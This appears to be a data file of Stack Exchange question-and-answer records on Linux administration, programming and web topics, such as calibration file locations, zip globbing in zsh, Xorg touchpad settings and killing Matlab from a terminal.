_unix.227098 | I've been writing a Linux device driver for some measurement devices I'm attaching to my Raspberry Pi. I've created my kernel module and an application to access the character device driver, but the device needs to be calibrated regularly and I need to store the calibration data somewhere. Where is that data usually stored? My best guess is /etc, but I'd like to hear from someone who knows more about this than I do. | Where to store calibration files for a custom Linux device driver | drivers;directory structure | Per the Filesystem Hierarchy Standard, /var/lib/ might be the right place:This hierarchy holds state information pertaining to an application or the system. State information is data that programs modify while they run, and that pertains to one specific host. Users must never need to modify files in /var/lib to configure a package's operation.State information is generally used to preserve the condition of an application (or a group of inter-related applications) between invocations and between different instances of the same application. State information should generally remain valid after a reboot, should not be logging output, and should not be spooled data./etc isn't right for calibration data, since /etc should be able to be mounted read-only. |
_softwareengineering.34463 | So I'm not doing any unit testing. But I've had an idea to make it more appropriate for my field of use. Yet it's not clear if something like this exists, and if, how it would possibly be called.Ordinary unit tests combine the test logic and the expected outcome. In essence the testing framework only checks for booleans (did this match, did the expected result result). To generalize, the test code itself references the audited functions, and also explicites the result values like so:unit::assert( test_me() == 17 )What I'm looking for is a separation of concerns. The test itself should only contain the tested logic. The outcome and result data should be handled by the unit testing or assertion framework. As example:unit::probe( test_me() )Here the probe actually doubles as collector in the first run, and afterwards as verification method. The expected 17 is not mentioned in the test code, but stored or managed elsewhere.How is this scheme called? Or how would you call it? I hope I can find some actual implementations with the proper terminology.Obviously such a pattern is unfit for TDD. It's strictly for regression testing. Also obviously, it cannot be used for all cases. Only the simpler test subjects can be analyzed that way, for anything else the ordinary unit test setup and assertion steps are required. And yes, this could be manually accomplished by crafting a ResultWhateverObject, but that would still require hardwiring that to the test logic.Also keep in mind that I'm inquiring for use with scripting languages, and not about Java. I'm aware that the xUnit pattern originates there, and why it's hence as elaborate as it is.Btw, I've discovered one test execution framework which allows for shortening simple test notations to:test_me(); // 17While thus the result data is no longer coded in (it's a comment), that's still not a complete separation and of course would work only for scalar results. | Term for unit testing that separates test logic from test result data | unit testing | There is such a thing as data-driven tests. These aren't the same thing you are asking for, but they may help with some of what you want.Basically, the idea is that we define data structures and perform tests based on them.An example:translations = { 1 : 'I', 2 : 'II', 4 : 'IV', 125 : 'CXXV'}def test_roman(): for number, roman in translations.items(): assert to_roman(number) == roman assert from_roman(roman) == numberThis makes it much easier to add additional test cases. In frameworks with support for it it can easily be made so that this would actually get recorded as many tests. I'm not sure what exactly you are attempted to get from your technique. You have to deal with all the setup of unit tests but skipping over what would seem to be a relatively minor part: specifying the output. It seems such a small savings and would only rarely be useful. |
_webmaster.27647 | Not a major problem, but I would like to understand more about how some websites can serve different pages to a navigating user, such that the browser doesn't visibly pass through a blank white page. Whereas some sites cause the browser to display the white page for up to a few seconds.I can imagine this is partly due to network latency, but are there any other factors? Can I cause the background image / color not to flash white? | Avoiding background and main menu reloads (white flash) when users navigate my site? | html | The 'White Flash' your referring to is the browser drawing the webpage. There was a great question about how to track how long it takes different browsers to draw your website (latency aside).Another good question to refer to is how to speed up your site through various tools and techniques.But what I think you're looking for is AJAX. Asyncronous JavaScript And XML; this will allow you to reload page content without reloading the page, thereby completely avoiding the 'White Flash.'EDIT: I just realized a technique that you could use that is extremely simple. You could use iframes! I didn't think of it because it's kind of an outdated technique. I haven't used it since high school, but using iframes you should be able to get the desired results. |
_unix.339148 | I recently installed Kali Linux to enable me to dual boot between Kali and Windows 7. I had to install Kali in UEFI mode, because that was the only thing that worked. Windows 7 however, is not installed in UEFI mode. Because of this I can't boot Windows from the UEFI GRUB loader. To fix this I installed rEFInd as suggested by this answer. My problem is that rEFInd does not detect my windows loader on /dev/sda1. I have uncommented the scanfor line in refind.conf and added hdbios as one of the options without any success. I also uncommented uefi_deep_legacy_scan although that shouldn't be necessary since everything is on the same disk (only different partitions). I have also tried manually adding the Windows loader to the list, but it doesn't even appear as an option when I boot (I probably did not add it correctly).Is there anything I can do to fix this? Does anyone know how I manually can add it to the list? Or is my Windows loader broken? If so, what can I do then? (I don't have any installation CD or anything like that for Windows) | rEFInd does not find Windows 7 | kali linux;grub2;refind | null |
_unix.368118 | I have an SD card in my raspberry PI, on which I pulled the power. Now, I cannot boot from it, or even read it from my (Fedora) laptop. When running fsck I get this error: [bf@localhost ~]$ sudo fsck -V /dev/mmcblk0p2fsck from util-linux 2.28.2[/sbin/fsck.ext4 (1) -- /dev/mmcblk0p2] fsck.ext4 /dev/mmcblk0p2 e2fsck 1.43.3 (04-Sep-2016)/dev/mmcblk0p2 has unsupported feature(s): FEATURE_I17e2fsck: Get a newer version of e2fsck!It somehow sees some unsupported feature that blocks any usage of the card. Any other fs tool (tunefs, debugfs) come with the same error. | Cannot mount SD card after hard shutdown | ext4;fsck;sd card | null |
_unix.192228 | I have a network topology where in Dell PE860 runs a Linux virtual-switch br0:Now if I send an Ethernet frame to broadcast address from IBM ThinkCentre:17:10:23.569021 00:a1:ff:01:02:05 > ff:ff:ff:ff:ff:ff, ethertype IPv4 (0x0800), length 34: 127.0.0.1 > 127.0.0.1: ip-proto-0 0..then I see this frame in both virtual-machines as I should. If I send an Ethernet frame to MAC address which is not know in br0 MAC address table, then the br0 also behaves correctly and floods the frame to all ports expect to one where the frame came in(eth1 in this example). However, if I send a multicast frame from IBM ThinkCentre:17:17:05.513283 00:a1:ff:01:02:05 > 01:33:44:55:66:77, ethertype IPv4 (0x0800), length 34: 127.0.0.1 > 127.0.0.1: ip-proto-0 0..then for some reason Linux virtual-switch does not flood it to all the ports(except the one where the frame came in from). Why is that so? I would expect that switch handles multicast frames exactly like broadcast frames. | multicast frames in Linux virtual-switch | linux;bridge | null |
_codereview.155840 | I am wondering if I could implement this in a cleaner, more elegant, strictly functional way:const convert2dArrayToJsonList = (array) => { if (!is2dArrayParsableToJsonList(array)) { throw new Error(The 2D array cannot be converted to a json list + array); } const propertyKeys = array[0]; return array .slice(1) .map( row => { return row.reduce( (accumulatedElement, propertyValue, currentIndex, array) => { accumulatedElement[propertyKeys[currentIndex]] = propertyValue; return accumulatedElement; }, {}); });}The implementation of is2dArrayParsableToJsonList(array) is not relevant in this context, it does what it says.The 2D array parameter has the property keys in the top row and all other rows represent individual elements in the list. | Converting a 2D array to a JSON list | javascript;array;functional programming | null |
_unix.125264 | I want to configure my system so that tap-to-click is disabled on the touchpad. (It's running a rather old version of ALTLinux distro with xorg-server-1.4.2-alt10.M41.1.)I'm interested in a solution without running synclient in each X session.Probably, my X server is too old so that it doesn't understand InputClass sections in xorg.conf, as suggested in another answer by Vincent Nivoliers:Section InputClass Identifier touchpad catchall Driver synaptics MatchIsTouchpad on MatchDevicePath /dev/input/event* Option MaxTapTime 0EndSectionThe I get an error; from Xorg.*.log:(==) Using config file: /etc/X11/xorg.confParse error on line 71 of section InputClass in file /etc/X11/xorg.conf InputClass is not a valid section name.(EE) Problem parsing the config file(EE) Error parsing the config fileAlso, my xorg.conf doesn't have any explicit InputDevice sections (with a comment: With libXiconfig we don't need configuration for ps and usb mice.).How do I put the MaxTapTime option into my xorg.conf so that the configuration of my input devices (including the touchpad) is not broken? (If I write explicit InputDevice sections, I might break the correct configuration obtained automatically..)Perhaps, the output of xinput list can be of some use. I do not want to make the question too specific by posting my xinput list and asking what to do in this specific case. Let it be just an example:$ xinput listVirtual core keyboard id=0 [XKeyboard] Num_keys is 248 Min_keycode is 8 Max_keycode is 255Virtual core pointer id=1 [XPointer] Num_buttons is 32 Num_axes is 2 Mode is Relative Motion_buffer is 256 Axis 0 : Min_value is 0 Max_value is -1 Resolution is 0 Axis 1 : Min_value is 0 Max_value is -1 Resolution is 0AT Translated Set 2 keyboard id=4 [XExtensionKeyboard] Type is KEYBOARD Num_keys is 248 Min_keycode is 8 Max_keycode is 255PS/2 Mouse id=3 [XExtensionPointer] Type is MOUSE Num_buttons is 32 Num_axes is 2 Mode is Relative Motion_buffer is 256 Axis 0 : Min_value is -1 Max_value is -1 Resolution is 1 Axis 1 : Min_value is -1 Max_value is -1 Resolution is 1AlpsPS/2 ALPS GlidePoint id=2 [XExtensionPointer] Type is TOUCHPAD Num_buttons is 12 Num_axes is 2 Mode is Relative Motion_buffer is 256 Axis 0 : Min_value is 0 Max_value is -1 Resolution is 1 Axis 1 : Min_value is 0 Max_value is -1 Resolution is 1$ I expect the answer to give some general advice, not specific for this case. | Can one disable tap-to-click in X server configuration without InputClass sections? | xorg;touchpad;x server;xinput;altlinux | Besides InputClass there also exists a section called InputDevice which takes nearly the exact same options as InputClass. Of course you cannot use the Match* operators but have to give the device's path explicitly:Section InputDevice Identifier touchpad Driver synaptics Option Device /dev/input/event<X> Option MaxTapTime 0EndSectionYou'll just have to replace <X> with the appropriate device number. |
_codereview.157809 | I sometimes do experiments at work and separate the computation and the analysis so I can do the computation on a cluster and the analysis locally and sometimes in a Jupyter notebook. I wrote a class which allows me to save results to a hidden file as if it was a dictionary. The idea is to create an object specifying the name of the experiment and from there you can use it as a dictionary, and it is saved to disk so you can access it from other python files. I'd appreciate any thoughts since IO isn't my forte. I used python 2.7 but I think it should work for python 3.0import osimport cPickle as pickleclass FileDict(): def __init__(self, name, default = None): self.fpath = '.{}.fd'.format(name) self.default = default def __getitem__(self, key): if os.path.isfile(self.fpath): d = pickle.load(open(self.fpath)) if key in d: return d[key] else: return self.default def __setitem__(self, key, value): if os.path.isfile(self.fpath): d = pickle.load(open(self.fpath)) d[key] = value else: d = {key : value} pickle.dump(d, open(self.fpath, 'w'))if __name__ == '__main__': test = FileDict('test', 0) print(test[1]) test[1] = 'thing' print(test[1]) print(test[2]) | A python default dictionary which seamlessly saves to disk | python;python 2.7;file;io;dictionary | null |
_cs.62323 | In which stage ( on an ideal 5-stage pipeline ) are branches and hazards handled? How much is the branch penalty for a branch hazard or data hazard. Is there different stages to find data hazards or branch hazards ( meaning for example branch hazards occurs on the 2th stage in the pipeline) or are all hazards detected at a specific stage? | Basic question about branches and pipelines | cpu pipelines | null |
_unix.303949 | I have a directory that contains several sub-directories. There is a question about zipping the files that contains an answer that I ever-so-slightly modified for my needs. for i in */; do zip zips/${i%/}.zip $i*.csv; doneHowever, I run into a bizarre problem. For the first set of folders, where zips/<name>.zip does not exist, I get this error:zip error: Nothing to do! (zips/2014-10.zip) zip warning: name not matched: 2014-11/*.csvhowever when I just echo the zip statements:for i in */; do echo zip zips/${i%/}.zip $i*.csv; doneThen run the echoed command (zip zips/2014-10.zip 2014-10/*.csv), it works fine and zips up the folder. Then the fun part about that is that subsequent runs of the original command will actually zip up folders that didn't work the first time!To test this behavior yourself:cd /tmpmkdir -p 2016-01 2016-02 2016-03 zipsfor i in 2*/; do touch $i/one.csv; donefor i in 2*/; do touch $i/two.csv; donezip zips/2016-03.zip 2016-03/*.csvfor i in 2*/; do echo zip zips/${i%/}.zip $i*.csv; donefor i in 2*/; do zip zips/${i%/}.zip $i*.csv; doneYou'll see that the echo prints these statements:zip zips/2016-01.zip 2016-01/*.csvzip zips/2016-02.zip 2016-02/*.csvzip zips/2016-03.zip 2016-03/*.csvHowever, the actual zip command will tell you: zip warning: name not matched: 2016-01/*.csvzip error: Nothing to do! (zips/2016-01.zip) zip warning: name not matched: 2016-02/*.csvzip error: Nothing to do! (zips/2016-02.zip)updating: 2016-03/one.csv (stored 0%)updating: 2016-03/two.csv (stored 0%)So it's actually updating the zip file with the .csvs where the zip file exists, but not when the zip file is created. And if you copy one of the zip commands:$ zip zips/2016-02.zip 2016-02/*.csvadding: 2016-02/one.csv (stored 0%)adding: 2016-02/two.csv (stored 0%)Then re-run the zip-all-the-things:for i in 2*/; do zip zips/${i%/}.zip $i*.csv; doneYou'll see that it updates for 2016-02 and 2016-03. Here's my output of tree:. 2016-01 one.csv two.csv 2016-02 one.csv two.csv 2016-03 one.csv two.csv zips 2016-02.zip 2016-03.zipAlso, (un)surprisingly, this works just fine:zsh -c $(for i in 2*/; do echo zip zips/${i%/}.zip $i*.csv; done)What am I doing wrong here? (note, I am using zsh instead of bash, if that makes any difference) | Why does `zip` in a for loop work when the file exists, but not when it doesn't? | shell script;shell;zsh;quoting;zip | Expansion by the shellThe quotes around $i*.csv make the difference. With the quotes, the shell expands that string to 2014-11/*.csv. That exact file doesn't exist, and zip reports an error. Without quotes, the * also expands (via filename expansion/globbing), and the resulting zip command is a complete list of matching files, each as a separate argument. You can get the second behaviour, inside the for loop, with:for i in */ ; do zip zips/${i%/}.zip $i*.csv ; doneExpansion by zipzip can also expand wildcards for itself, but not in all situations. From the zip manual:The zip program can do the same matching on names that are in the zip archive being modified or, in the case of the -x (exclude) or -i (include) options, on the list of files to be operated on, by using backslashes or quotes to tell the shell not to do the name expansion.The original command works on subsequent attempts, after you've successfully created an archive, because zip tries to match the wildcards against the contents of the existing archive. They exist there, and still exist on the filesystem, so they're reported with updating:.To get zip to handle the wildcards when creating the archive, use the -r (recurse) option to recurse into the requested directory, and -i (include) to limit it to files matching the pattern: for i in */ ; do zip -r zips/${i%/}.zip $i -i '*.csv' ; done |
_unix.308181 | Fig. 1 Pressing two times CTRL+C in Terminal does not act but puts two line breaks in Matlab's command lineI think there is something wrong with the keybindings. I have tried both Windows and Emacs unsuccessfully. The keybinding works in Mathematica. Debian 8.x is supported by MathWorks for Matlab so it should be supported. Related conditionsTyping CTRL+C in Matlab's prompt does not enter kill but a line break...Differential solutionsOpen Matlab's prompt and enter exit. Open System Monitor and give kill and/or force kill signal to Matlab Matlab: 2016a, 2016b prereleaseHardware: Asus Zenbook UX303UAOS: Debian 8.5Linux kernel: 4.6 (backports)Related: [could not find finally anything; most conditions are related to the condition where you type the thing directly in Matlab's prompt]Service ticket of MathWorks: 02154064 | Why Matlab 2016a cannot be killed by Terminal's CTRL-C in Debian 8.5? | debian;keyboard shortcuts;kill;matlab | The default meaning of Ctrl+C is to send the signal SIGINT. The conventional meaning of SIGINT is to halt the task that's currently running in the foreground and let the user provide new input. I'm using task in the informal meaning of whatever the computer is doing. This is not necessarily a separate process. In a program like Matlab that reads successive commands and processes them a REPL SIGINT is supposed to bring the user back to that program's prompt, not to kill the program. When the foreground task is a program that does one job and then exits, SIGINT is supposed to kill the program since that's the way to bring the user back to the shell prompt.Try Ctrl+\. This sends the signal SIGQUIT, and the conventional meaning of SIGQUIT is to exit immediately and (if the system is configured for it) leave a core dump. Not all programs keep that meaning, I don't know if Matlab does.If the kill signal keys aren't working, try Ctrl+Z to send SIGSTOP which suspends the program and brings you back to a shell prompt where you can send some other signal. When you suspend a job, the shell shows a message like[1]+ Stopped matlabThe number in brackets is the job number. You can use %1 instead of a process ID to send a signal to the process from that shell, e.g. kill %1 here to send SIGTERM (normal kill signal), and if that doesn't work then kill -KILL %1 (SIGKILL, the kill signal that doesn't give the application a chance).If you can't interrupt the application to reach the shell running on that terminal, kill it from another shell running in another terminal. |
_cstheory.4866 | Given a directed graph $G=(V,A)$ with a unique source node $s$ (a node without incoming edges) and a unique sink node $t$ (a node without outgoing edges).Given a sequence of variables $SEQ = (x_{i_1},x_{i_2},...,x_{i_m})$ with $|SEQ| > 2$ and each $i_j \in [1..m]$For example $SEQ = (x_1,x_2,x_3,x_4,x_2,x_3,x_5)$ (m=5).A node assignment is a function $f: \{x_1,...,x_m\} \rightarrow V$ such that if $i \neq j$ then $f(x_i) \neq f(x_j)$ (it maps each $x_j$ to a different node of the graph). Now, if in $SEQ$ we substitute $x_j$ with $f(x_j)$ we obtain a sequence $NODESEQ$ of nodes.We want to start from $s$ and end in $t$ so trivially $x_1 = s, x_m = t$.For example: $NODESEQ = (s,v_1,v_7,v_9,v_1,v_7,t)$A valid node assignment is an assignment such that if we substitute each $x_{i_j}$ with $f(x_{i_j})$ in the sequence $SEQ$ we obtain a valid path from $s$ to $t$.Problem 1:Given a directed graph $G$ with one source and one sink and a sequence of variables $SEQ$ check if a valid node assignment exists.I'm not an expert, but if we take $m=n=|V|$ and $SEQ=(x_1,...,x_n)$ then the problem becomes the Hamiltonian Path problem. Informally HAM-PATH can be reduced to Problem 1, adding a source node $s$ and a sink node $t$, two extra variables at the beginning and end of $SEQ$: $(x_s,x_1,...,x_n,x_t)$ and edges $(s,u), (v,t)$ for every $u,v \in V$, (hence Problem 1 is in NPC).But we can modify it and drop the condition that if $i \neq j$ then $f(x_i) \neq f(x_j)$ i.e we can assign the same node $v$ to more than one $x_i$ (I call it relaxed node assignment). We get an (apparently) simpler problem.Problem 2:Given a directed graph $G$ with one source and one sink and a sequence of variables $SEQ$ check if a valid **relaxed node assignment** exists.An informal way to describe the problem: we have a chain made of segments. Now we wrap it up in some casual order and join some innermost endpoints. The problem 2 consists in checking if such wrapped chain can fit in a given graph.Is this problem known?Is it still an NPC problem? | Is it easy to fit a wrapped chain in a graph? | ds.algorithms;graph algorithms | Allow me to try to redeem my previous incorrect answer with an attempt at showing that this problem is NP-complete via a reduction from GRAPH 3-COLORABILITY. The key idea is to identify SEQ as a list of edges of some graph and observe that a relaxed node assignment corresponds to a graph homomorphism.Let $H = (U, E)$ be a connected, undirected graph with $U = \{u_1, u_2, \ldots, u_n\}$. Let $P = (u_{a_1}, u_{a_2}, \ldots, u_{a_p})$ be a (non-simple) path in $H$ that traverses every edge at least once (i.e.: if there is an edge between $u_i$ and $u_j$, then they appear consecutively in $P$ in either order). First, we need to show that $P$ is not too long. We can construct $P$ as follows:Start at $u_1$.Visit each neighbor of $u_1$, returning to $u_1$ after each visit. I.e., if the neighbors of $u_1$ are $u_{n_1}, u_{n_2}, \ldots, u_{n_d}$, we have the following sequence: $u_1, u_{n_1}, u_1, u_{n_2}, u_1, \dots, u_1, u_{n_d}, u_1$.Travel to $u_2$.Visit each neighbor of $u_2$.etc...By visiting each vertex's neighbors, each edge in $H$ is traversed. Each neighbor visitation step adds $O(n)$ steps to the path. Each travel to a successive vertex adds another $O(n)$ steps. So, in total length of $P = (u_{a_1}, u_{a_2}, \ldots, u_{a_p})$ is $O(n^2)$.Let $SEQ = (x_0, x_{a_1}, x_{a_2}, x_{a_3},\ldots,x_{a_p}, x_{n+1})$ be the sequence of variables.Let $G = (V, A)$ be the complete, directed graph on three vertices adjoined with a universal source and a universal sink. Explicitly, let $V = \{v_1, v_2, v_3, v_{source}, v_{sink}\}$. There is an arc from $v_{source}$ to $v_i$ and from $v_i$ to $v_{sink}$ for $i=1,2,3$. And, for all $i,j = 1,2,3, i \neq j$ there is an arc from $v_i$ to $v_j$. Finally, we claim that a valid relaxed node assignment from $SEQ$ to $G$ exists iff $H$ is 3-colorable. Let $c:U \rightarrow \{1,2,3\}$ be a 3-coloring of $H$. Let $f:X \rightarrow V$ be defined by:$f(x_0) = v_{source}$$f(x_{n+1}) = v_{sink}$$f(x_i) = v_{c(u_i)}$It should be clear that $f$ is a valid relaxed node assignment. It should be equally clear that we can reverse this construction to use any valid relaxed node assignment to define a 3-coloring of $H$. |
_softwareengineering.264381 | I have an angular app that concentrates most of its functionality around a primary entity that has several satellite entities. The UI for this is effectively one screen, with a few tabs, one for each satellite. There are also some modal dialogs with content for a couple of the satellites that deserve their own subview, produced by clicking on a link in a tab.The controller for this screen is growing rather large, as it has a set of REST calls for each entity, along with functions to produce and dismiss the various dialogs. All the subviews for the tabs are stuffed into the main screen as well, inside a tab set.How can I split out these files, giving each tab its own controller and view? | How can I structure my angular app so that I don't end up with one huge controller and view? | mvc;angularjs | null |
_webmaster.10452 | Say I have a site 123example.com, with roughly 100 backlinks, which has increased from a google page 27 to page 12 for my keywords over the last month and continues toward the top 10... I have another domain 123.com, which has roughly 30 backlinks, that just points to the 1st domain. I would like to use 123.com as the primary domain and use a 301 redirect on 123example.com.Would I have to start my link building back over again for 123.com or will the backlinks and PR with the 301 redirect of 123example.com transfer over to the new domain? | 301 redirect and page ranking | domains;pagerank;301 redirect | null |
_unix.67890 | I am using Debian Squeeze. Suddenly I have started facing a problem that my user is not able to make directories and other such tasks. Running mkdir abc gives memkdir: cannot create directory 'abc': Disk quota exceededMy hard disk is not full df -h results areFilesystem Size Used Avail Use% Mounted on/dev/md1 1.8T 39G 1.8T 3% /tmpfs 7.8G 0 7.8G 0% /lib/init/rwudev 7.8G 148K 7.8G 1% /devtmpfs 7.8G 0 7.8G 0% /dev/shm/dev/md0 243M 31M 200M 14% /bootuname -a output that might be needed isLinux server 2.6.32-5-686-bigmem #1 SMP Sun Sep 23 10:27:25 UTC 2012 i686 GNU/LinuxNote: If I login as root then everything is fine. This problem is only with a particular userEdit: output of quotaDisk quotas for user user (uid 1000): noneoutput of quota -gDisk quotas for group user (gid 1000): Filesystem blocks quota limit grace files quota limit grace/dev/disk/by-uuid/26fa7362-fbbf-4a9e-af4d-da6c2744263c8971324* 1048576 1048576 none 43784 0 0 | Disk quota exceeded problem | debian | The disk isn't full, but the disk space allowed for this user is full. You need to check quota(1), perhaps persuade the suspect to clean up their junk, or in an outburst of kindness increase it with edquota(8). |
_unix.318654 | How could I go about finding uneven file/directory permissions within a directory structure? I've made some attempts at using the find command similar to:find /bin ! \( -perm 777 -o -perm 776 -o -perm 775 -o -perm 774 -o -perm 773 -o -perm 772 -o -perm 771 -o -perm 770 -o -perm 760 -o -perm 750 -o -perm 740 -o -perm 730 -o -perm 720 -o -perm 710 -o -perm 700 -o -perm 600 -o -perm 500 -o -perm 400 but I run out of command line before I can complete the remaining permutations plus an -exec ls -lL {} \;I've also been doing manual things similar to:ls -lL /bin | grep -v ^-rwxr-xr-x | grep -v ^-rwx--x--x | grep -v ^-rwsr-xr-x | grep -v ^-r-xr-xr-x | grep -v ^-rwxr-xr-t but again, I run out of command line before I can complete the remaining permutations.Both methods seem unusually awkward. Is there a better, faster, easier way? Note that I'm restricted in the shell I'm using (sh) and platform (Irix 6.5.22). | How would I find uneven file permissions within a directory structure? | permissions;find;security;irix | are you looking for executable files?find . -type f -perm /+xregardless, the / mode is more than likely your friend... here is the man page: -perm /mode Any of the permission bits mode are set for the file. Symbolic modes are accepted in this form. You must specify `u', `g' or `o' if you use a symbolic mode. See the EXAMPLES section for some illustrative examples. If no permission bits in mode are set, this test matches any file (the idea here is to be consistent with the behaviour of -perm -000).UPDATE:right, i though you were looking for uneven numbers (executable ones)...this should work (still using 3rd perm param from findsample data:$ ls000 001 002 003 004 005 006 007 010 020 030 040 050 060 070 100 200 300 400 500 600 700Find command:$ find . -type f \( -perm /u-x,g+x -o -perm /u-w,g+w -o -perm /u-r,g+r -o -perm /g-x,o+x -o -perm /g-w,o+w -o -perm /g-r,o+r -o -perm /u-x,o+x -o -perm /u-w,o+w -o -perm /u-r,o+r \) | sort./001./002./003./004./005./006./007./010./020./030./040./050./060./070Basically you are saying, give me files where group has perms but owner does not, or files where world has perms but group does not, or where world has perms but owner does not.note: find has 3x perm params;perm modeperm -modeperm /modeps I'm not all too sure of the value of this... |
_webmaster.78322 | I am a UX designer, and one of my clients had some questions for me about Google Analytics. His organization has a Facebook page and uses some paid Facebook advertising. The comments on many of his Facebook posts (which promote his new blog articles) come from his site's regular readers.Using a time scale in the past 30 days, Google Analytics is showing about 72% new users for his site. In the same time period, about 65% of his traffic from Facebook is new users. (If I shorten the time period to just yesterday, it's about 45% from Facebook and 63% from all sources.) Since he expects most of his audience is regular readers, he would like to know: why would Google Analytics be showing so much of his audience as new?I told him that it's likely to be happening because of some combination of users using private browsing / Do Not Track and cookies not persisting between sessions. But we would like to know if there are any other factors. | Why does Google Analytics show such a high percentage of traffic from Facebook as new users? | google analytics | null |
_webapps.45376 | When I receive an e-mail invitation via Google Apps, there are two places where it asks if I'm going, and I'm never sure which one to click (see screenshot). Does it matter which one I click? What's the difference, and why does it always ask twice? | Which set of response links should I use when responding to a meeting invitation in Gmail/Google Apps Email? | gmail;google apps email | There is no difference. The reason there are 2 is because top response is a Gmail add-on that recognizes a Google Calendar invitation, and then displays a Calendar widget to make it easier for you to reply.The second is the actual invitation email message, which does include RSVP links in the body text. The reason you see both is just that Gmail will add the widget automatically. If you invite a non-Gmail user, they will only see the email body text, and will have to use those links.My personal preference is to use the top links for 2 reasons:Clicking on the top link will highlight the RSVP selection in bold and will remember the choice if you open the email again. It's also more convenient to view your agenda as you respond.Clicking on the top link will let you respond in the email itself quickly and let you move on to other email. Clicking the bottom link will open a new tab and take you to Calendar, which is inconvenient when all I want to do is respond quickly and be done with it. I get no new information when forced into Calendar. |
_unix.189782 | I am having trouble accessing a folder with a very long name with in its name.seems like every time I try to input the putty window is not parsing the character successfully.Any ideas? | putty does not allow me to input special chars | centos;putty | null |
_webmaster.107844 | Google Search Console shows me my site search page duplicate Title Tag, | How can I avoid site search page duplicate title tag error in pagination of site search? | google search console;web crawlers;webmaster | null |